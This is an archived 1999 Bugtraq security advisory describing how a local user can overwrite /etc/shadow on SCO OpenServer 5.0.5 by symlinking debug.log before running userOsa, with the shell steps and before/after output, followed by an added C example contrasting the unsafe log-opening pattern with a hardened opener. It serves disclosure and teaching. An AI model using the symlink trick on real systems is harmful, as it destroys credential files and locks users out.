Bugtraq mailing list archives
SCO OpenServer 5.0.5 overwrite /etc/shadow
From: btellier () WEBLEY COM (Brock Tellier)
Date: Mon, 11 Oct 1999 15:24:59 -0500
Greetings,

Any user may overwrite any file with group auth (i.e. /etc/shadow, /etc/passwd) using /etc/sysadm.d/bin/userOsa. Note that this will not change the permissions of the file or allow for the user to input a passwd entry string into these files, it will simply clobber the contents of the file with debug output.

When userOsa receives invalid input, it generates a log file called "debug.log" in the PWD. This file is created with group auth permissions, does not check for this file's existence, and will follow symlinks. Thus the exploit is as follows:

scohack:/tmp$ ln -s /etc/shadow.old debug.log
scohack:/tmp$ /etc/sysadm.d/bin/userOsa
bah
connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}
Failed to listen to client
Failure in making connection to OSA.
scohack:/tmp$

-----

BEFORE EXPLOIT:

scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 26 Oct 11 20:08 /etc/shadow.old

AFTER EXPLOIT (note the file size):

scohack:/# l /etc/shadow.old
-rw-rw---- 1 root auth 177 Oct 11 20:10 /etc/shadow.old
scohack:/# cat /etc/shadow.old
Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
<<< SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}})
scohack:/#

Brock Tellier
UNIX Systems Administrator
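
Added example, not part of the original post and not SCO's code: the log-opening pattern the message describes (no existence check, symlinks followed) beside a hardened opener, run against a constructed victim file in a private temp directory. The function names, file names and sample contents are hypothetical, and the code assumes a POSIX.1-2008 system that provides O_NOFOLLOW and mkdtemp(), not OpenServer 5.0.5 itself.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the post describes: no existence check, symlinks followed. */
static int open_log_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0660);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if anything, including a
 * symlink (dangling or not), already has that name. O_NOFOLLOW is defence
 * in depth, and mode 0600 keeps the log private to the caller. */
static int open_log_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario: "victim" stands in for the protected file and
 * "debug.log" is a symlink to it. Returns the victim's size after the chosen
 * opener has run and written one log line, or -1 on a setup error. */
long victim_size_after(int use_safe, int *open_errno) {
    char dir[] = "/tmp/logdemoXXXXXX", victim[64], log[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(log, sizeof log, "%s/debug.log", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("root:x:constructed-sample-entry\n", f);   /* 32 bytes */
    fclose(f);
    if (symlink(victim, log) != 0) return -1;
    int fd = use_safe ? open_log_safe(log) : open_log_unsafe(log);
    *open_errno = (fd < 0) ? errno : 0;
    if (fd >= 0) { if (write(fd, "Debug log opened\n", 17) < 0) perror("write"); close(fd); }
    long size = (stat(victim, &st) == 0) ? (long)st.st_size : -1;
    unlink(log); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    int e;
    printf("unsafe opener: victim now %ld bytes\n", victim_size_after(0, &e));
    printf("safe opener:   victim now %ld bytes\n", victim_size_after(1, &e));
    return e == EEXIST ? 0 : 1;
}
```

A privileged program should additionally write such logs to a directory that unprivileged users cannot write to, or open them with the invoking user's credentials rather than the elevated group.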